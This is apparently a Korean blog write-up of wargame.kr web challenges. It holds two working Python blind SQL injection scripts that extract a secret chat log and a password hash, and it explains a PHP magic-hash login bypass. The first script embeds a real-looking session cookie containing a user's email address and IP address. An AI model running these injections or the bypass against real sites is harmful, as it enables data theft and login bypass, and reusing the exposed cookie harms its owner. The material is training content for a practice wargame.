import urllib2, re

print "[+] Start!"
flag = ""
for i in range(40):
        # Character codes 48..96: digits, uppercase letters, '_' and a few
        # punctuation marks; lowercase letters are not tried.
        for j in range(48,97):
                dat = "t=1&ni=20798%20and%20if(substring((select%20readme%20from%20chat_log_secret%20limit%200,1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,55555)"
                url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
                # NOTE(review): published live session cookie (name, e-mail
                # and IP embedded) -- keep out of committed code.
                req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
                # No timeout / error handling; `re` is imported but unused.
                res = urllib2.urlopen(req).read()
                # True-marker: a chat row was rendered -> character matched.
                if "font-size:12px;" in res:
                        flag += chr(j)
                        break
print "[*] FLAG : " + flag 
print "[+] Finish!"

플래그를 구했습니다.





jff3_magic 문제를 풀어보겠습니다.



문제를 시작하면 한개의 웹 페이지가 나옵니다. 페이지에 대한 기능을 학습한 후 문제에 접근하도록 하겠습니다.


먼저 메인화면에는 로그인 폼이 있습니다. 그리고 왼쪽 사이드에는 MemberList라는 이름으로, index.php에 no 파라미터를 붙여 이동하는 <a> 태그들이 있습니다.

cd80은 1 Orang은 2 Comma는 3 으로 말이죠.


한번 Submit버튼으로 로그인을 시도해보도록 하겠습니다.



아무것도 입력하지 않고 버튼을 클릭하면 위와 같이 나옵니다. 


184b8482a0c050dca54b59c7f05bf5dd 를 구글에 검색하면



Haval128,5 해시라고 유추할 수 있습니다. 이 문제의 이름이 magic인 것으로 보아 magic hash 취약점이라는 것을 알 수 있습니다.


magic hash 취약점에 대해선 구글에서 검색하시면 자세히 볼 수 있습니다.


그리고 아까 no 파라미터에 쿼리를 조작하겠습니다.

?no=1||1 로 입력할 시 


 


취약점이 존재하는것을 알 수 있습니다.


python 스크립트를 이용해 injection을 해보겠습니다.

# jff3_magic: blind extraction of the `pw` column through the `no` GET
# parameter of /jff3_magic/. For each position i (1..32) and each candidate
# character c from `string`, the condition
#   lpad(pw, i+1, space(1)) = '<recovered prefix><c>'
# is OR-ed onto the row filter with `5||(...)`; lpad() shortens pw to i+1
# characters, so this compares the prefix of pw. A hit is detected by the
# text "admin" appearing in the response.
# 32 positions and a [a-z0-9] alphabet fit the 32-character hex digest the
# writeup shows for this challenge (presumably why no other characters are
# tried; a value outside this alphabet would be silently skipped).
#
# Defender note: here the injected condition is a plain comparison with no
# information_schema reference, so signature-based detection is weaker; the
# effective control is server-side -- bind `no` as an integer parameter.
import urllib, urllib2, re

string = "abcdefghijklmnopqrstuvwxyz0123456789"
# `key` accumulates the recovered prefix of pw.
key = ""

for i in range(32):
        for j in range(len(string)):
                url = "http://wargame.kr:8080/jff3_magic/?no="
                payload = "5||(lpad(pw," + str(i+1) + ",space(1))='" + key + string[j] + "')"
                # Sent raw: the payload is not URL-encoded, urllib2 passes the
                # characters (including spaces-free punctuation) as-is.
                url += payload
                # An explicitly empty Cookie header: no session is needed here.
                req = urllib2.Request(url, headers={"Cookie": "",})
                # No timeout / error handling; an HTTPError aborts the run.
                res = urllib2.urlopen(req).read()
                # re.findall() returns a (possibly empty) list; truthy when
                # "admin" occurs, equivalent to `"admin" in res`.
                ok = re.findall("admin", res)
                if ok: 
                        key += string[j]
                        break

print "[*] Key : " + key

아래와 같은 결과를 얻을 수 있습니다. 



Haval128,5 해시 값이 0e로 시작하는 입력값을 찾아서 넣어주면 풀릴 것 같습니다.

http://sso.pe.kr/15를 참고하시면 됩니다.


ID는 admin

PW는 아래와 같이 haval128,5 해시 값이 0e로 시작하는 115528287을 입력합니다.



문제가 풀렸습니다.




python script 참고 : http://choiys.tistory.com/entry/Wargamekr-Web800jff3magic

